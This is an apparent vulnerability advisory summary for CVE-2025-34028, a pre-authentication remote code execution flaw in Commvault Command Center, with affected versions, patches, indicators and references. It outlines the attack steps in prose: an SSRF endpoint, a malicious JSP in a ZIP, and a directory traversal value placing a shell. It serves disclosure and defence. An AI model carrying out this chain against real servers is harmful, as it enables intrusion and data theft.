Full Report
A critical security flaw has been disclosed in the Commvault Command Center that could allow arbitrary code execution on affected installations. The vulnerability, tracked as CVE-2025-34028, carries a CVSS score of 9.0 out of a maximum of 10.0. "A critical security vulnerability has been identified in the Command Center installation, allowing remote attackers to execute arbitrary code without
Analysis Summary
# Vulnerability: Critical Pre-Authenticated Remote Code Execution in Commvault Command Center
## CVE Details
- CVE ID: CVE-2025-34028
- CVSS Score: 9.0 (Critical)
- CWE: Not explicitly mentioned, but indicative of Improper Access Control leading to RCE/SSRF.
## Affected Systems
- Products: Commvault Command Center
- Versions: 11.38.0 through 11.38.19 (Innovation Release)
- Configurations: Any installation running the affected versions of the Command Center.
## Vulnerability Description
A critical vulnerability exists in the Commvault Command Center, allowing remote attackers to achieve fully pre-authenticated Remote Code Execution (RCE). The flaw is rooted in the `/commandcenter/deployWebpackage.do` endpoint, which suffers from an unauthenticated Server-Side Request Forgery (SSRF) due to a lack of filtering on destination hosts. An attacker can exploit this SSRF by uploading a specially crafted ZIP archive containing a malicious `.JSP` file. The process involves:
1. Sending an HTTP request to `/commandcenter/deployWebpackage.do` pointing to an external server hosting the malicious ZIP.
2. The system unzips the contents to a temporary directory (`.tmp`).
3. Using the `servicePack` parameter, the attacker forces directory traversal to place the file into a publicly accessible directory (e.g., `../../Reports/MetricsUpload/shell`).
4. A subsequent request to execute the JSP file results in RCE on the server.
## Exploitation
- Status: PoC available (Researcher report confirms successful exploitation path)
- Complexity: Low (Pre-authenticated RCE achievable via crafted HTTP requests)
- Attack Vector: Network (Remote)
## Impact
- Confidentiality: High (Potential full access to the system/environment)
- Integrity: High (Ability to modify system files and state)
- Availability: High (Potential for system denial or compromise)
## Remediation
### Patches
- **Fixed Versions:**
- 11.38.20
- 11.38.25
### Workarounds
- No specific workarounds were detailed in the provided text, but immediate patching is strongly advised given the critical nature and RCE capability. Limiting network access to the Command Center interface should generally be considered if patching is delayed.
## Detection
- **Indicators of Compromise:** Unusual file creation or execution within temporary directories or the `/Reports/MetricsUpload/` path, specifically looking for `.jsp` files and associated service requests.
- **Detection methods and tools:** WatchTowr Labs provided a **Detection Artefact Generator** tool, which organizations can use immediately to check if their instance is vulnerable. Monitoring network traffic targeting the `/commandcenter/deployWebpackage.do` endpoint for suspicious parameters or external host requests is recommended.
## References
- Vendor Advisory: https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html
- Researcher Report: https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028
- Detection Tool: https://github[dot]com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028